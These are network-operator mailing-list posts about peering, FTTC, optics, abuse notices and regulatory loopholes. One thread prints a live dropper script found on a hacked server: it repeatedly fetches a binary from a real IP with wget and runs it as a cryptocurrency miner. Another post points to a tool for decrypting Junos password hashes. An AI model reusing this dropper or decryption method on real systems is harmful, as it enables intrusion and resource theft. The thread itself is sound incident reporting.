Anyone using or playing with this? https://stackstorm.com/ Going to take a look, but we have all the bits underneath already. Will see how crippled they're base version is. Usual "it's open source" model maybe. Thanks. -- Kind Regards, Gavin Henry.
[uknof] Sri Lanka options
Dear all, One of our partners[1] customers is based in Sri Lanka and we're having issues with latency creeping up to them. We're usually good via our tier 1 transits (Level3 and NTT) at around 180ms, but it's now up to 260ms and causing issues for their tunnels into the kit our partner hosts for them in one of our Telehouse East racks. We've reached out directly to SLT.LK who provide their leased line out there and they adjusted routing into Telia, then into Level3 the last time this happened. We've tried again with no response. So I'm looking for options. They are on AMX-IX, but not sure about being on the RS. That may not improve anything as we'd need to get up their first. I'll contact our tier ones and companies we already have NNI's with but wanted to check if anyone can offer me anything? We need a guaranteed 5mb/s pipe with < 200ms or something similar. Ideas? Thanks for reading, Gavin. [1] http://www.surevoip.co.uk/partners/partner -- Kind Regards, Gavin Henry. Managing Director. T +44 (0) 330 44 50 000 D +44 (0) 330 44 55 007 M +44 (0) 7930 323266 F +44 (0) 1224 824887 E ghe...@suretec.co.uk Open Source. Open Solutions(tm). http://www.suretecsystems.com/ Winner of the Best Business ITSP (Medium Enterprise) 2016! http://www.surevoip.co.uk/2016-best-provider Suretec Systems is a limited company registered in Scotland. Registered number: SC258005. Registered office: 24 Cormack Park, Rothienorman, Inverurie, Aberdeenshire, AB51 8GL. Subject to disclaimer at http://www.suretecgroup.com/disclaimer.html Do you know we have our own VoIP provider called SureVoIP? See http://www.surevoip.co.uk OpenPGP (GPG/PGP) Public Key: 0x8CFBA8E6 - Import from hkp://pool.subkeys.pgp.net or http://www.suretecgroup.com/0x8CFBA8E6.gpg
[uknof] Junos license changes
Evening all, I suppose old news, but then I can't find anything online about the change from a quick Google. Had a meeting with our Juniper account manager today and have learned the new SRX range, at least, now come with only firewall features and other "basic" things for the same price as the old range. You now have to pay a licence fee for things like MPLS and Junos is no longer licensed to the hardware. The coming of whitebox networking to the rest of the Juniper range and not just the vXX and OCX range ( http://www.juniper.net/uk/en/products-services/switching/ocx1100/)?? I'm sure they'll make tons from the "Certified for Junos" model like Red Hat etc. Gavin. -- Kind Regards, Gavin Henry. Winner of the Best Business ITSP (Medium Enterprise) 2016! http://www.surevoip.co.uk/2016-best-provider
Re: [uknof] Copper ethernet for OoB in Telehouse East
Hi all, All sorted now. Thanks. -- Kind Regards, Gavin Henry. Winner of the Best Business ITSP (Medium Enterprise) 2016! http://www.surevoip.co.uk/2016-best-provider OpenPGP (GPG/PGP) Public Key: 0x8CFBA8E6 - Import from hkp://pool.subkeys.pgp.net or http://www.suretecgroup.com/0x8CFBA8E6.gpg
[uknof] Copper ethernet for OoB in Telehouse East
Hi all, Can anyone offer me something? Nothing fancy. We're in TFM61 M07. Happy to reciprocate. Thanks. -- Kind Regards, Gavin Henry. Winner of the Best Business ITSP (Medium Enterprise) 2016! http://www.surevoip.co.uk/2016-best-provider OpenPGP (GPG/PGP) Public Key: 0x8CFBA8E6 - Import from hkp://pool.subkeys.pgp.net or http://www.suretecgroup.com/0x8CFBA8E6.gpg
Re: [uknof] FTTC Wires only
> Haven’t tried it yet, but the Draytek Vigor 130 should do the same job - > transparent Ethernet/VDSL bridge. They might be a bit more expensive, but as > a UK company, they may be sympathetic to the plight - and also keen to plug > the gap in the market and clean-up in the process. > We use these for our customers (business customers) with great success. I run one at home too via a Juniper SRX100 on FTTC full 80/20. Works nice with our VoIP. -- Kind Regards, Gavin Henry. http://www.surevoip.co.uk OpenPGP (GPG/PGP) Public Key: 0x8CFBA8E6 - Import from hkp://pool.subkeys.pgp.net or http://www.suretecgroup.com/0x8CFBA8E6.gpg
Re: [uknof] BGP configuration best practices from ANSSI and others
> Please don't use that guide as the basis for any BGP speaking router in the > 21st Century :) Patches welcome. -- Kind Regards, Gavin Henry. http://www.surevoip.co.uk OpenPGP (GPG/PGP) Public Key: 0x8CFBA8E6 - Import from hkp://pool.subkeys.pgp.net or http://www.suretecgroup.com/0x8CFBA8E6.gpg
[uknof] BGP configuration best practices from ANSSI and others
Hi all, This is really very good (in case anyone missed it): http://www.ssi.gouv.fr/uploads/2013/10/BGP_configuration_best_practices.pdf for (as per listed in PDF): SR-OS (Alcatel-Lucent) IOS (Cisco) Junos (Juniper) OpenBGPD (OpenBSD) Covers: Interconnection 1: bilateral peering in an Internet exchange point Interconnection 2: peering using a route server in an exchange point Interconnection 3: private peering between two ASes in a Network Access Point, or interconnection in a telecommunications room Interconnection 4: session established in multihop with relationships: Relationship 1: transit / stub customer Relationship 2: transit AS / small transit AS Relationship 3: peering I'm sure it's old new, but very handy to save. Thanks. -- Kind Regards, Gavin Henry. http://www.surevoip.co.uk OpenPGP (GPG/PGP) Public Key: 0x8CFBA8E6 - Import from hkp://pool.subkeys.pgp.net or http://www.suretecgroup.com/0x8CFBA8E6.gpg
[uknof] More Telecity woes?
Hi all, What's the latest? Thanks. -- Kind Regards, Gavin Henry. Managing Director. T +44 (0) 1224 279484 M +44 (0) 7930 323266 F +44 (0) 1224 824887 E ghe...@suretec.co.uk Open Source. Open Solutions(tm). http://www.suretecsystems.com/ Suretec Systems is a limited company registered in Scotland. Registered number: SC258005. Registered office: 24 Cormack Park, Rothienorman, Inverurie, Aberdeenshire, AB51 8GL. Subject to disclaimer at http://www.suretecgroup.com/disclaimer.html Do you know we have our own VoIP provider called SureVoIP? See http://www.surevoip.co.uk OpenPGP (GPG/PGP) Public Key: 0x8CFBA8E6 - Import from hkp://subkeys.pgp.net or http://www.suretecgroup.com/0x8CFBA8E6.gpg
Re: [uknof] Notice of Claimed Infringement
Interesting. We replied to them saying we've forwarded the report to the customer. They just replied with (end of the "issue" I guess): = *IP-Echelon Support Team* (IP-Echelon) Sep 14, 04:19 Dear Gavin Henry, Thank you for contacting IP-Echelon. We appreciate the steps you have taken to ensure your network is not used to facilitate copyright infringement. At this time no further action is required. Sincerely, IP-Echelon Support Team
Re: [uknof] Notice of Claimed Infringement
> > Machine readable, even. Here is a pseudonymised example: > > > < Yep, this is the exact one.
Re: [uknof] Notice of Claimed Infringement
> > Do they not provide even a simple amount of info such as offending IP > address and date/time? > > Yes, time/date/filename/port/ip/protocol Very detailed. -- Kind Regards, Gavin Henry. Managing Director. T +44 (0) 1224 279484 M +44 (0) 7930 323266 F +44 (0) 1224 824887 E ghe...@suretec.co.uk Open Source. Open Solutions(tm). http://www.suretecsystems.com/ Suretec Systems is a limited company registered in Scotland. Registered number: SC258005. Registered office: 24 Cormack Park, Rothienorman, Inverurie, Aberdeenshire, AB51 8GL. Subject to disclaimer at http://www.suretecgroup.com/disclaimer.html Do you know we have our own VoIP provider called SureVoIP®? See http://www.surevoip.co.uk OpenPGP (GPG/PGP) Public Key: 0x8CFBA8E6 - Import from hkp://subkeys.pgp.net or http://www.suretecgroup.com/0x8CFBA8E6.gpg
Re: [uknof] Notice of Claimed Infringement
> After a little more analysis we became sure it was mostly due to one > source. We quickly tracked the offender down to someone in network ops > who was running a torrent client without setting bandwidth limits! A > quiet word was had. Complaints about network speed stopped. > Nice one!
Re: [uknof] Notice of Claimed Infringement
Thanks Brendan and all. -- Kind Regards, Gavin Henry. Managing Director. T +44 (0) 1224 279484 M +44 (0) 7930 323266 F +44 (0) 1224 824887 E ghe...@suretec.co.uk Open Source. Open Solutions(tm). http://www.suretecsystems.com/ Suretec Systems is a limited company registered in Scotland. Registered number: SC258005. Registered office: 24 Cormack Park, Rothienorman, Inverurie, Aberdeenshire, AB51 8GL. Subject to disclaimer at http://www.suretecgroup.com/disclaimer.html Do you know we have our own VoIP provider called SureVoIP®? See http://www.surevoip.co.uk OpenPGP (GPG/PGP) Public Key: 0x8CFBA8E6 - Import from hkp://subkeys.pgp.net or http://www.suretecgroup.com/0x8CFBA8E6.gpg
Re: [uknof] Notice of Claimed Infringement
> Get in touch with your customer, ask them to stop it, and get back to > Paramount and inform them of the same. Thanks. That's the least we'll do. Their business connection could have been compromised and they're unaware. We'll see.
[uknof] Notice of Claimed Infringement
Morning all, Just received a notice from Paramount about BitTorrent file sharing from one of our connectivity customers. How do others handle this? Any advice appreciated. -- Kind Regards, Gavin Henry.
Re: [uknof] FTTC roll out logic?
On 4 June 2015 at 11:28, Neil J. McRae wrote: > The NGA roll out is focused on the consumer market and return. I suspect > your location would have been delivered under one of the rural extension > schemes which I think would be HIE in your area. See my slides at -2 > Uknofs for the wider build picture in Scotland. Thanks Neil. Yes, they were very interesting! -- Kind Regards, Gavin Henry. http://www.surevoip.co.uk OpenPGP (GPG/PGP) Public Key: 0x8CFBA8E6 - Import from hkp://subkeys.pgp.net or http://www.suretecgroup.com/0x8CFBA8E6.gpg
Re: [uknof] FTTC roll out logic?
> A big office might be on an exchange only line without a PCP (Primary > Connection Point / green cabinet) to put an FTTC cabinet next to. > > BT Openreach claim to be working on a solution for EO lines. I'm not sure > what it will be or when it might happen. Ah, that makes more sense now. Thanks. -- Kind Regards, Gavin Henry. http://www.surevoip.co.uk OpenPGP (GPG/PGP) Public Key: 0x8CFBA8E6 - Import from hkp://subkeys.pgp.net or http://www.suretecgroup.com/0x8CFBA8E6.gpg
Re: [uknof] FTTC roll out logic?
On 4 Jun 2015 11:16, "boggits" wrote: > > On 4 June 2015 at 11:00, Gavin Henry wrote: > > How does this selection process for > > upgrading exchanges get decided?!? > > Some have posited the following > > 1. Money - upgrade locations where there is business case in terms of > density of end users with available cash to spend > 2. Market Protection - Upgrade where VM have coverage, where other 3rd > parties are deploying their solution and at the same time don't > upgrade business areas (unless you have to) to stop Ethernet losses > 3. Politics - because either someone is paying you to do the work or > its the only way to shut someone up > But isn't it Openreach doing these? Are the rollout plans given to Ofcom and justified to Ofcom? That's their job to oversee this. When will the minimum legal of 2mb/s access get increased?
[uknof] FTTC roll out logic?
Morning all, So this is almost a full 24 hours in from getting FTTC activated at home yesterday. Coming from 7mb/s~ down and 1.5mb/s~ up to 66mb/s down and 20mb/s up is amazing. What a difference this has made when working at home. This is running on a Juniper SRX100 and Vigor 130 into plus.net. We peer with plus.net on LONAP and LINX so my traffic to our network (AS199659) is fast. Another point is that if I put in our own realm/username/password it comes in to our LNS's, which is cool (it's BT Wholesale circuits). I've kept it separate for now though. I watched eagerly when the cabinet went up and even went down (right geek) and chatted to the Openreach guys. That was March 1st, which took a further 3 months until we could place the order. The Openreach tech was late yesterday for the 8am-1pm slot, so I went down to the exchange and grabbed him. All good and very happy. My point is that this is in a small village called Rothienorman with one of those small brown shed type exchanges (forget the correct name). I can't get FTTC in our main office in Aberdeen, the heart of the Oil and Gas sector in Europe. How does this selection process for upgrading exchanges get decided?!? Thanks, Gavin. -- Kind Regards, Gavin Henry. http://www.surevoip.co.uk
[uknof] Sanity check: Houston/US PoP
Hi all, We're thinking about expanding our network to Houston as all of our Aberdeen based Oil and Gas customers have an office there and they are asking about options. This will obviously allow US originated hosted VoIP traffic to stay there and other benefits. Correct me if I've completely got this wrong but this would mean: * colo or our own rack space there * our normal routing, switching and server kit * address space to announce from ARIN via transit (so we can offer public services there too) * obviously backhaul to our THE PoP, which we can then dish traffic out to our other PoP's * Peering (which I understand not to be as easy and open as here?) * US SIP carrier or TDM interconnect for breakout (we could use Level3 for some of that as we use them here for transit) Who do you recommend working with in Houston for this as I'm certain others have this already on the list? What blindly obvious thing have I forgotten at this time of night? Thanks (AS199659) -- Kind Regards, Gavin Henry. http://www.surevoip.co.uk OpenPGP (GPG/PGP) Public Key: 0x8CFBA8E6 - Import from hkp://subkeys.pgp.net or http <http://www.suretecgroup.com/0x8CFBA8E6.gpg>:// <http://www.suretecgroup.com/0x8CFBA8E6.gpg>www.suretecgroup.com <http://www.suretecgroup.com/0x8CFBA8E6.gpg>/0x8CFBA8E6. <http://www.suretecgroup.com/0x8CFBA8E6.gpg>gpg <http://www.suretecgroup.com/0x8CFBA8E6.gpg>
Re: [uknof] The operator's operator
On 23 March 2015 at 20:25, Rod Beck wrote: > Watch the feeding frenzy and I thought 10 gig waves were competitive. I will > stick to my niche. :) My email wasn't an offer, just a question :-)
Re: [uknof] The operator's operator
> Bogons can do all of the above :) > > The problem with FTTC from a small provider (like us) is that the per-Mbps > we get charged by the wholesalers means we can't offer unlimited usage like > the big players can (who depend on 75% of their users barely using it at all). > > As long as you're not taking the p*ss, we're reasonably tolerant. We're the same. We use TTB LLU's for unlimited products (fixed cost across the TTB network from the CPE to our NNI's) and BTW for the FTTC stuff (but only for busienss traffic). Although looking at TTB EoFTTC products too. We go through an aggregator for this. On BT WBC do you get charged 95th for traffic from the CPE to your NNI or do you pay for a big pipe? Using our BTW account I've downloaded their WBC and WBMC price lists and I've never seen anything like it! The xls is mental. Nothing like the SIP one. -- Kind Regards, Gavin Henry. http://www.surevoip.co.uk
[uknof] BT Calypso 999 Emergency File Format (EFF 999) and Openreach EMP XML API Open source libs
Evening all, As far as I can tell I've not seen anything open source for this. We have had permission to put our implementation out that we use. It will go on the CPAN sometime this month and github (Text::EFF999). We're about to start the same for Openreach EMP integration. Not sure if we'll be allowed to open source any code yet (or a suitable license). Conf call with Openreach tomorrow morning re discussion around service establishment for EAD, LLU and WLR3. Therefore, our work will only involve those three products but at least the framework will be there once. If we come across anything during our SS7 interconnect work we'll do the same. We're great believers in open source (as it powers all of our services and we contribute where we can) and wanted to know if other network/telco devs/devops etc. would be willing to look over this code and contribute, when ready, via github and/or similar? No dates yet. I just hate the fact that the 999 stuff is getting done again and again by us all and the few Openreach XML API consumers out there controlling who you have to go to if you want to use a web gui. Thanks, Gavin. Disclaimer: Since we've not had our first call with Openreach yet, I may have got this all wrong and it may not happen. -- http://www.surevoip.co.uk
Re: [uknof] Smartoptics still around?
On 20 Dec 2014 21:53, "Fearghas McKay" wrote: > > > > On 20 Dec 2014, at 21:44, Gavin Henry wrote: > > > > I've already ordered FlexOptix, but it seems our vendors supplier only "supports" SmartOptics. > > > > That's a new one variation on vendor lock in. I know. We'll be fine :) > > BTW, is V3 new as we have a re-enconder unit already from you. > > It has QSFP+, so we ship you one if you order QSFP+ and have a v2 box already. Otherwise there are no extra features apart from the glowing lights on the top :-) If you have a metal box with three slots you have v3, two slots v2. > > Next box will probably have more :) OK, great. These ones are for our new Allegro Networks ports to get us on to IXmanchester until we need a full PoP and get us on SNAP.
Re: [uknof] Smartoptics still around?
On 20 Dec 2014 21:38, "Fearghas McKay" wrote: > > > > On 20 Dec 2014, at 21:17, Joseph Waite wrote: > > > > I'm just getting page won't load. I don't use them as I find http://www.solid-optics.com/ cheaper. There based in Netherlands but ship next day and I'm pretty sure they don't charge postage. They also now offer a re-coding box to re-code their optics. > > Their box only does SFP/+ and XFP, no QSFP. I've already ordered FlexOptix, but it seems our vendors supplier only "supports" SmartOptics. BTW, is V3 new as we have a re-enconder unit already from you. -- Kind Regards, Gavin Henry.
Re: [uknof] Smartoptics still around?
Thanks. I actually had FlexOptix in my basic too. -- Kind Regards, Gavin Henry. On 20 Dec 2014 21:17, "Joseph Waite" wrote: > I'm just getting page won't load. I don't use them as I find > http://www.solid-optics.com/ cheaper. There based in Netherlands but ship > next day and I'm pretty sure they don't charge postage. They also now offer > a re-coding box to re-code their optics. > > Regards > > Joe Waite > > On 20 Dec 2014, at 20:49, Gavin Henry wrote: > > Anyone else's getting this 508? > > -- > Kind Regards, > > Gavin Henry. > > > >
Re: [uknof] High Density Wifi
On 10 December 2014 at 20:40, Rod Beck wrote: > Does anyone think that free WIFI in public places actually builds the > "Digital Economy"? I tend to think this is just feel good politics. I travel, > and yes, it is useful to have free access. But ... It's certainly free to the public but the public have paid for it. Just look at the contract value on that link. -- Kind Regards, Gavin Henry.
Re: [uknof] High Density Wifi
I wonder what these guys are using? Not as high density as what you want to do I'm sure. Just announced in our home city: http://www.publiccontractsscotland.gov.uk/search/show/Search_View.aspx?id=DEC194619 by http://www.pinaclsolutions.com/aberdeen-wifi "Free public WiFi will soon be available across 24 publicly accessible council properties in Aberdeen, as part of the latest work to be delivered by the Accelerate Aberdeen programme. " Gavin.
Re: [uknof] Edinburgh leased lines
Hi Martin, Take a look at https://www.connectionvouchers.co.uk/ to cover any install costs. Edinburgh is covered. Thanks.
[uknof] Link from THE to THN?
Evening all, Can anyone offer me a link from TFM61 in THE across to BT's NAP in THN? Thanks. -- Kind Regards, Gavin Henry.
Re: [uknof] Loopholes, Ethics and Business Acumen with Ofcom and RIPE
On 20 October 2014 09:03, Adrian Kennard wrote: > On 05/09/14 11:47, Gavin Henry wrote: >> 2. Ofcom - with the newish charges per number range per year, for area >> codes that are classified as scarce, at £0.50 you get a £0.20~ >> discount on numbers ported out to another company. Upon a customer >> sign up for a telephone number in a scarce area, immediately port it >> to another Ltd company you own and receive your £0.20 per number per >> year discount. > > We are doing this - separate company handles the ported numbers and > wholesales them back to us. So far OFCOM have accepted the discount > claim, but failed actually get the bills right. > > Once the billing is all sorted, we will be in a position of wanting to > encourage more number take up in conservation areas, as we only get the > discount on ported numbers and only actual in-use numbers can be ported. > > This commercial incentive to us is the exact opposite of OFCOMs intentions. Thanks Adrian. Yeah, seems nothing wrong with 1 or 2 I've mentioned then. Gavin. -- Kind Regards, Gavin Henry.
Re: [uknof] Loopholes, Ethics and Business Acumen with Ofcom and RIPE
On 5 September 2014 11:50, Neil J. McRae wrote: > > On 05/09/2014 11:47, "Gavin Henry" wrote: >> >>Thoughts? For me it's one of those things that should be very easily >>spotted and stopped, but does the blame lay with the schemes in >>general? > > You can¹t please all of the people all of the time. Yep, that's where I got to. Didn't want to come across ranty. -- Kind Regards, Gavin Henry. http://www.surevoip.co.uk OpenPGP (GPG/PGP) Public Key: 0x8CFBA8E6 - Import from hkp://subkeys.pgp.net or http://www.suretecgroup.com/0x8CFBA8E6.gpg
[uknof] Loopholes, Ethics and Business Acumen with Ofcom and RIPE
Hi all, Thinking about this, as I know it's being done but wanted others opinions on it and wondered what RIPE and Ofcom are doing about it or if they care: 1. RIPE - start a new Ltd company, pay your 2000 Euros to RIPE and get a /22 with no ASN. Transfer that back to your existing company for free. Saves paying £10~ per IPv4 address for a /22 on the open market. Or do this and add to your IP brokerage company so you can sell them. Various issues but folks are doing it. 2. Ofcom - with the newish charges per number range per year, for area codes that are classified as scarce, at £0.50 you get a £0.20~ discount on numbers ported out to another company. Upon a customer sign up for a telephone number in a scarce area, immediately port it to another Ltd company you own and receive your £0.20 per number per year discount. Thoughts? For me it's one of those things that should be very easily spotted and stopped, but does the blame lay with the schemes in general? Thanks, Gavin. -- Kind Regards, Gavin Henry. http://www.surevoip.co.uk OpenPGP (GPG/PGP) Public Key: 0x8CFBA8E6 - Import from hkp://subkeys.pgp.net or http://www.suretecgroup.com/0x8CFBA8E6.gpg
Re: [uknof] UK IPv6 Taskforce
> /22 ? > > http://www.ripe.net/ripe/policies/proposals/2014-01 Sorry, when we got our LIR status that is. Even tougher now. Either need to buy them or buy someone. -- Kind Regards, Gavin Henry. http://www.surevoip.co.uk OpenPGP (GPG/PGP) Public Key: 0x8CFBA8E6 - Import from hkp://subkeys.pgp.net or http://www.suretecgroup.com/0x8CFBA8E6.gpg
Re: [uknof] UK IPv6 Taskforce
On 5 September 2014 08:31, Neil J. McRae wrote: > On 05/09/2014 08:15, "Gavin Henry" wrote: > >>On 5 September 2014 07:51, Neil J. McRae wrote: >>> Hmm! Unfortunately that sounds like a made up imaginary world though! >>>:) Or is someone actually doing this (and have more than 75k customers >>>were the /23 would give challenges)? >> >>We're doing it, but don't have 75k customers :-( > > So no Internet access at all, just to your own content? That's right, but just for VoIP Only access. The content being a SIP or Video call on Hosted VoIP/DDI etc. It means we can actually keep a VoIP only access circuit really low priced. There is more to do for clever folks using IPv6 to IPv4 tunnels etc. but it's a good start rather than going out and paying ~£10 ex VAT per IP address on a /22 above the /22 you get as an LIR (buying a failing ISP may be cheaper for > /22 at the moment). But saying that, there are still plenty IPv4 out there to buy if we need to which wouldn't take more than 1-2 months billing to make a return. Gavin. -- Kind Regards, Gavin Henry. http://www.surevoip.co.uk OpenPGP (GPG/PGP) Public Key: 0x8CFBA8E6 - Import from hkp://subkeys.pgp.net or http://www.suretecgroup.com/0x8CFBA8E6.gpg
Re: [uknof] UK IPv6 Taskforce
On 5 September 2014 07:51, Neil J. McRae wrote: > Hmm! Unfortunately that sounds like a made up imaginary world though! :) Or > is someone actually doing this (and have more than 75k customers were the /23 > would give challenges)? We're doing it, but don't have 75k customers :-( -- Kind Regards, Gavin Henry. http://www.surevoip.co.uk OpenPGP (GPG/PGP) Public Key: 0x8CFBA8E6 - Import from hkp://subkeys.pgp.net or http://www.suretecgroup.com/0x8CFBA8E6.gpg
Re: [uknof] UK IPv6 Taskforce
> Now, only one of these groups is really feeling the pain of address > depletion, and that's the access ISPs(2). Some feel that pain badly, and > it's certainly true that there's no way you could enter the market as an > access ISP in the UK given a /22 of address space. You can if you're selling access to your own services and you're dual stack. This allows you to run the CPE side in IPv6 only, but then you're possibly a content provider selling access to your own content?? :-) -- Kind Regards, Gavin Henry. http://www.surevoip.co.uk OpenPGP (GPG/PGP) Public Key: 0x8CFBA8E6 - Import from hkp://subkeys.pgp.net or http://www.suretecgroup.com/0x8CFBA8E6.gpg
Re: [uknof] Automatic / Zero Touch Device Configuration
You need your own API James :) -- Kind Regards, Gavin Henry.
Re: [uknof] Wanted: BT TDM Interconnect & SS7 Switch
Hi Joe, This is legit as we (SureVoIP) were looking too: http://uk.businessesforsale.com/uk/UK-SS7-Telecoms-Interconnect-Business-For-Sale.aspx Thanks.
Re: [uknof] DNS global issue?
Alerting has detected it's back.
Re: [uknof] DNS global issue?
BT IP Exchange is down due to this too. Can't get through to IPX help desk since 09:20. They do have a message on there saying something is up.
Re: [uknof] Thus box - fibre?
Excellent to hear! Gavin. -- Kind Regards, Gavin Henry.
Re: [uknof] Thus box - fibre?
Thanks all. Will let you know how I get on. The only thing on the front is a small lable that looks too short to be a unique ID. I'll got back in the morning and trace into the loft. Gavin.
[uknof] Thus box - fibre?
Hi all, I'm trying to work out what this is Thus box is (link to the image http://imgur.com/kXIB2zA) on a customer site hoping it's fibre that can be re-established. Any ideas what is it and what I can do? Thanks, Gavin. -- Kind Regards, Gavin Henry.
[uknof] decrypting Junos authentication-keys
Hi all, Just a quick one if you misplace the password you've used for an authentication key, if you use: http://securityxploded.com/juniper-password-decryptor.php and paste your $9 prefixed hash, it instantly shows your password. One we forgot to document was revealed like this. That tool comes with a virus (wajam_validate.exe installer) so run via wine on Linux/Mac as it fails to install, or on a throw away VM. Thanks. -- Kind Regards, Gavin Henry. http://www.surevoip.co.uk
Re: [uknof] Capacity/ subscriber ramp-up graphs
On 5 Jun 2014 07:01, "Gavin Davis" wrote: > > > Hi > > Would anyone have a pretty graph showing subscirber to traffic capacity ustilisation for ADLS2 services from zero to 100/200K subs > > Just looking for the magic number where the avergae user traffic can be more accurately estimated for capacity management Business or consumer? Thanks.
Re: [uknof] 3rd party remote hands in Telehouse
> Actually, quality of work is poor - if done in tandem with their cabling, We've had problems with cables runs and fibre having it's cladding bursting out once. > they produce a rats nest and subsequently knock cables out when working in a > busy rack or bend fibre beyond their bend radius limit. A big chunk of this > is they don't know how to manage structured cabling. Prior to their policy > changed we used 3rd parties for all the works and they maintained nicely > groomed cable trays and ran patching neatly. Not had to do too much of this as yet. > If I was regularly needing work carrying out on a non emergency basis I > would outsource. The contractors I used to use have got other jobs now so I > don't know who to suggest but this list ought to have some ideas... It's pretty disappointing if this is true and not raised with them to rectify given the prices paid. -- Kind Regards, Gavin Henry.
Re: [uknof] 3rd party remote hands in Telehouse
What's up with Telehouse remote hands? Never and an issue with quality of work. Cost? Gavin.
Re: [uknof] Very weird server process, hacked? /tmp/w00t /tmp/lllll /tmp/toplel
Hi Tom,
Yeah, see this:
http://www.opsview.com/forum/opsview-core/bug-reports/nrpe-215-vulnerability
and this from a reply to the abuse email of the IP address range used:
http://krebsonsecurity.com/2013/07/botcoin-bitcoin-mining-by-botnet/
Thanks.
On 21 April 2014 16:04, Tom Storey wrote:
> Probably also worth making /tmp noexec so that stuff like this has a
> harder time getting started.
>
> On 20 April 2014 20:14, Gary Steers wrote:
>> All,
>>
>> This looks like its some form of crypto currency miner "xptMiner.exe", think
>> that ones a RieCoin one...
>>
>> Undoubtedly the servers in use are compromised in some way but may be worth
>> an abuse message to the contact on the RIR record in whois?
>>
>> Gavin, have sent you an e-mail off topic as well with a little more info,
>> hope it was useful.
>>
>> ---
>> Gary Steers
>> Chief Network Engineer | Boosty
>>
>>
>> On 20 April 2014 19:56, Gavin Henry wrote:
>>>
>>> Hi all,
>>>
>>> Not usually a post you see on uknof, but wanted some help and to check
>>> if anyone else has seen this?
>>>
>>> We've just started getting alerts from one of our servers for highload
>>> and discovered a weird process:
>>>
>>> nagios285936 0.0 0.0 10744 1468 ?S19:03 0:00
>>> bash /tmp/toplel
>>> nagios292199 102 0.5 3261868 362816 ? Rl 19:39 0:15 \_
>>> /tmp/w00t -d 0 -o http://128.65.210.244:8080 -u Seegee.lin -p 1 -s
>>> 2965706752
>>>
>>>
>>> root@hostname:/tmp# ls -lh
>>> total 1016K
>>> -rw-r--r-- 1 nagios nagios 0 Apr 20 18:26 l
>>> -rwxrwxrwx 1 nagios nagios 615 Apr 20 19:05 toplel
>>> -rwxrwxrwx 1 nagios nagios 1008K Apr 19 21:59 w00t
>>>
>>>
>>> No idea where it came from. All our stuff has OpenSSL updated as is
>>> our Nagios. w00t is a binary, toplel is a bash script containing:
>>>
>>> #!/bin/bash
>>> if [ $1 -le 10 ] ; then
>>> NUM = $(expr $1 + 1)
>>> nohup bash $0 $NUM >/dev/null 2>&1 &
>>> exit
>>> fi
>>> CORECOUNT=$(cat /proc/cpuinfo | grep -c processor)
>>> FREE=$(free -b | head -n2 | tail -n1 | awk '{print $4}')
>>> FREE=$(expr $FREE - 52428800)
>>> FREE=$(expr $FREE / $CORECOUNT)
>>>
>>> while true; do
>>> killall w00t
>>> wget http://162.213.24.40/nope-sse4 -O /tmp/w00t
>>> chmod 777 /tmp/w00t
>>> /tmp/w00t -d 0 -o http://128.65.210.244:8080 -u Seegee.lin -p 1 -s
>>> $FREE
>>>
>>> wget http://162.213.24.40/nope-nse4 -O /tmp/w00t
>>> chmod 777 /tmp/w00t
>>> /tmp/w00t -d 0 -o http://128.65.210.244:8080 -u Seegee.lin -p 1 -s
>>> $FREE
>>>
>>> sleep 300
>>> done;
>>>
>>>
>>>
>>> --
>>> Kind Regards,
>>> Gavin Henry.
>>>
>>
--
Kind Regards,
Gavin Henry.
Managing Director.
T +44 (0) 1224 279484
M +44 (0) 7930 323266
F +44 (0) 1224 824887
E ghe...@suretec.co.uk
Open Source. Open Solutions(tm).
http://www.suretecsystems.com/
Suretec Systems is a limited company registered in Scotland. Registered
number: SC258005. Registered office: 24 Cormack Park, Rothienorman,
Inverurie,
Aberdeenshire, AB51 8GL.
Subject to disclaimer at http://www.suretecgroup.com/disclaimer.html
Do you know we have our own VoIP provider called SureVoIP? See
http://www.surevoip.co.uk
OpenPGP (GPG/PGP) Public Key: 0x8CFBA8E6 - Import from hkp://subkeys.pgp.net
or http://www.suretecgroup.com/0x8CFBA8E6.gpg
Re: [uknof] Very weird server process, hacked? /tmp/w00t /tmp/lllll /tmp/toplel
On 21 Apr 2014 10:30, "Paul Mansfield" wrote: > > I'd still use the security setting if possible even if you think it's unnecessary... to avoid fat finger breakage. Yep, makes sense.
